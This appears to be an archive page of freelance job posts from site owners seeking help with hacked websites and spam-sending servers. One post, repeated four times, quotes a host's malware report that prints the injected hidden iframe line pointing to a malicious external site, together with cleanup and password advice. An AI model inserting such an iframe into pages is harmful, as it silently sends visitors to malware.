Archive

Posts Tagged ‘compromised’

Fix Coding For Compromised Site

September 29th, 2011 Comments off

My website, for a nonprofit organization, is being redirected to malicious sites. I believe they inserted some kind of code into the PHP files or created backdoors. The job would consist of fixing the code and preventing the issue from happening again. Please let me know your price. I will provide compensation only if the website is fixed and it is secure.

Server Compromised And Sending Spam

July 21st, 2011 Comments off

Hi,

I need to have a server expert help me identify and fix a problem I have on my dedicated linux server running CentOS5. I have 4 IPs on my server and spam is getting sent from all of them.

Ready to get this fixed asap.

Compromised Joomla Site

March 8th, 2010 Comments off

On Friday someone managed to compromise the server and install something that spam emails Amazon.com and puts the server load up to 75-80%.

This kills the server so nothing runs, and I am being bombarded by my web host to sort the problem fast!

We have detected the compromised accounts, and all 3 are running off Joomla, and more importantly, all 3 are running the same Gallery plugin.

We have found the injected script and we are looking for someone that is able to remove the hack, and more importantly fix the security hole.

Thank you for your time

Regards

Tez

Malware Problem Site

August 27th, 2009 Comments off

Site has been affected with Malware warnign by Google and need to get handled asap this was the review from our host provider what they found when reviewing site after attack as follows

The website “focuzprinting.com” was infected with a malicious iframe code(IFrame Injection Attack). There are lot of files under your domain infected with iframe attack. The files are infected with the code:

iframe src=”http://shopvideofest.cn:8080/index.php” width=120 height=189 style=”visibility: hidden

Since the access log of the domain is rotated, we are unable to find the exact source of his attack. It looks like the attacker used the vulnerability of either the php scripts(oScommerce and wordpress) or the weak permission of your files.

I could see that you are using old version of oScommerce(public_html) and wordpress(public_html/blog) for your site. If you have any local backup of your account, please upload it in your root folder(/home/focugcom) so that we can restore your account from it. Once the account has been restored, please upgrade your oScommerce and wordpress to its latest stable version.

We recommend the following in order stop such attacks in future:

1. Use strong password for your account FTP/Cpanel/mail. Please refer the URL http://strongpasswordgenerator.com to generate strong password.

Some secure password tips would be:

# Don’t use a dictionary word
# Don’t use part of the username
# Keep the password at least 7 characters long
# Have a combination of at least three of:
- lowercase characters (a, b, c)
- uppercase characters (A, B, C)
- numbers (1, 2, 3)
- non-alphanumeric characters (!, %, *, {,

Malware Problem Site

August 27th, 2009 Comments off

Site has been affected with Malware warnign by Google and need to get handled asap this was the review from our host provider what they found when reviewing site after attack as follows

The website “focuzprinting.com” was infected with a malicious iframe code(IFrame Injection Attack). There are lot of files under your domain infected with iframe attack. The files are infected with the code:

iframe src=”http://shopvideofest.cn:8080/index.php” width=120 height=189 style=”visibility: hidden

Since the access log of the domain is rotated, we are unable to find the exact source of his attack. It looks like the attacker used the vulnerability of either the php scripts(oScommerce and wordpress) or the weak permission of your files.

I could see that you are using old version of oScommerce(public_html) and wordpress(public_html/blog) for your site. If you have any local backup of your account, please upload it in your root folder(/home/focugcom) so that we can restore your account from it. Once the account has been restored, please upgrade your oScommerce and wordpress to its latest stable version.

We recommend the following in order stop such attacks in future:

1. Use strong password for your account FTP/Cpanel/mail. Please refer the URL http://strongpasswordgenerator.com to generate strong password.

Some secure password tips would be:

# Don’t use a dictionary word
# Don’t use part of the username
# Keep the password at least 7 characters long
# Have a combination of at least three of:
- lowercase characters (a, b, c)
- uppercase characters (A, B, C)
- numbers (1, 2, 3)
- non-alphanumeric characters (!, %, *, {,

Malware Problem Site

August 27th, 2009 Comments off

Site has been affected with Malware warnign by Google and need to get handled asap this was the review from our host provider what they found when reviewing site after attack as follows

The website “focuzprinting.com” was infected with a malicious iframe code(IFrame Injection Attack). There are lot of files under your domain infected with iframe attack. The files are infected with the code:

iframe src=”http://shopvideofest.cn:8080/index.php” width=120 height=189 style=”visibility: hidden

Since the access log of the domain is rotated, we are unable to find the exact source of his attack. It looks like the attacker used the vulnerability of either the php scripts(oScommerce and wordpress) or the weak permission of your files.

I could see that you are using old version of oScommerce(public_html) and wordpress(public_html/blog) for your site. If you have any local backup of your account, please upload it in your root folder(/home/focugcom) so that we can restore your account from it. Once the account has been restored, please upgrade your oScommerce and wordpress to its latest stable version.

We recommend the following in order stop such attacks in future:

1. Use strong password for your account FTP/Cpanel/mail. Please refer the URL http://strongpasswordgenerator.com to generate strong password.

Some secure password tips would be:

# Don’t use a dictionary word
# Don’t use part of the username
# Keep the password at least 7 characters long
# Have a combination of at least three of:
- lowercase characters (a, b, c)
- uppercase characters (A, B, C)
- numbers (1, 2, 3)
- non-alphanumeric characters (!, %, *, {,

Malware Problem Site

August 27th, 2009 Comments off

Site has been affected with Malware warnign by Google and need to get handled asap this was the review from our host provider what they found when reviewing site after attack as follows

The website “focuzprinting.com” was infected with a malicious iframe code(IFrame Injection Attack). There are lot of files under your domain infected with iframe attack. The files are infected with the code:

iframe src=”http://shopvideofest.cn:8080/index.php” width=120 height=189 style=”visibility: hidden

Since the access log of the domain is rotated, we are unable to find the exact source of his attack. It looks like the attacker used the vulnerability of either the php scripts(oScommerce and wordpress) or the weak permission of your files.

I could see that you are using old version of oScommerce(public_html) and wordpress(public_html/blog) for your site. If you have any local backup of your account, please upload it in your root folder(/home/focugcom) so that we can restore your account from it. Once the account has been restored, please upgrade your oScommerce and wordpress to its latest stable version.

We recommend the following in order stop such attacks in future:

1. Use strong password for your account FTP/Cpanel/mail. Please refer the URL http://strongpasswordgenerator.com to generate strong password.

Some secure password tips would be:

# Don’t use a dictionary word
# Don’t use part of the username
# Keep the password at least 7 characters long
# Have a combination of at least three of:
- lowercase characters (a, b, c)
- uppercase characters (A, B, C)
- numbers (1, 2, 3)
- non-alphanumeric characters (!, %, *, {,

Malware Problem Site

August 27th, 2009 Comments off

Site has been affected with Malware warnign by Google and need to get handled asap this was the review from our host provider what they found when reviewing site after attack as follows

The website “focuzprinting.com” was infected with a malicious iframe code(IFrame Injection Attack). There are lot of files under your domain infected with iframe attack. The files are infected with the code:

iframe src=”http://shopvideofest.cn:8080/index.php” width=120 height=189 style=”visibility: hidden

Since the access log of the domain is rotated, we are unable to find the exact source of his attack. It looks like the attacker used the vulnerability of either the php scripts(oScommerce and wordpress) or the weak permission of your files.

I could see that you are using old version of oScommerce(public_html) and wordpress(public_html/blog) for your site. If you have any local backup of your account, please upload it in your root folder(/home/focugcom) so that we can restore your account from it. Once the account has been restored, please upgrade your oScommerce and wordpress to its latest stable version.

We recommend the following in order stop such attacks in future:

1. Use strong password for your account FTP/Cpanel/mail. Please refer the URL http://strongpasswordgenerator.com to generate strong password.

Some secure password tips would be:

# Don’t use a dictionary word
# Don’t use part of the username
# Keep the password at least 7 characters long
# Have a combination of at least three of:
- lowercase characters (a, b, c)
- uppercase characters (A, B, C)
- numbers (1, 2, 3)
- non-alphanumeric characters (!, %, *, {,

Rebuild Compromised Site

June 2nd, 2009 Comments off

We have an existing site which has been compromised. Copy will remain the same but we need a rebuild. The design must be original and SEO freindly!!!! The copy stays the rest is up to you. Fast turnaround. Also YOU MUST NOT USE KNOW TEMPLATE THIS MUST BE ORIGINAL. ALSO IT MUST HAVE HIGH SECURITY> FAST TURNAROUND REQUIRED.

Rebuild Compromised Site

June 2nd, 2009 Comments off

We have an existing site which has been compromised. Copy will remain the same but we need a rebuild. The design must be original and SEO freindly!!!! The copy stays the rest is up to you. Fast turnaround. Also YOU MUST NOT USE KNOW TEMPLATE THIS MUST BE ORIGINAL. ALSO IT MUST HAVE HIGH SECURITY> FAST TURNAROUND REQUIRED.

Rebuild Compromised Site

June 2nd, 2009 Comments off

We have an existing site which has been compromised. Copy will remain the same but we need a rebuild. The design must be original and SEO freindly!!!! The copy stays the rest is up to you. Fast turnaround. Also YOU MUST NOT USE KNOW TEMPLATE THIS MUST BE ORIGINAL. ALSO IT MUST HAVE HIGH SECURITY> FAST TURNAROUND REQUIRED.

Rebuild Compromised Site

June 2nd, 2009 Comments off

We have an existing site which has been compromised. Copy will remain the same but we need a rebuild. The design must be original and SEO freindly!!!! The copy stays the rest is up to you. Fast turnaround. Also YOU MUST NOT USE KNOW TEMPLATE THIS MUST BE ORIGINAL. ALSO IT MUST HAVE HIGH SECURITY> FAST TURNAROUND REQUIRED.

Bear